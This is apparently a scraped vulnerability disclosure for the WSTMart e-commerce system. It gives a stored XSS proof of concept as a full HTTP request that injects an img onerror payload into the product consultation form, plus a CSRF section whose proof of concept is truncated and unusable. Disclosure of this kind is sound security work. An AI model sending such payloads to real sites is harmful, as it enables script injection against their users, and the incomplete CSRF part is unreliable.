wstmall / wstmart Goto Github PK

Shang tao software WSTMart e-commerce system is a based on THINKPHP framework 5.1 build B2B2C electric business platform, is now open source shopping system based on THINKPHP 5 is the most perfect, with PC, mobile phone WAP, micro mall, android APP, the APP, WeChat applet, six side one, six side each other, have nowadays one of the most popular level 3 distribution and function of micro bargaining, very suitable for enterprise and individual fast online business platform.

The code of the system is clear and easy to understand, a large number of visual reports are convenient for operators to make decisions, rich marketing functions make the application scenarios of the system broad, good plug-in mechanism makes the system more easy to expand. System operation is simple, safe and stable, update iteration is fast, is the majority of users direct use and secondary development of the best choice.

Official address: http://www.wstmart.net

0x01 stored XSS
Function point: mall some commodity details - commodity consultation
poc:
POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Connection: close
Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454

goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E

0x02 CSRF

18/5000
Function point: background management - staff management - login account
poc:
1234.html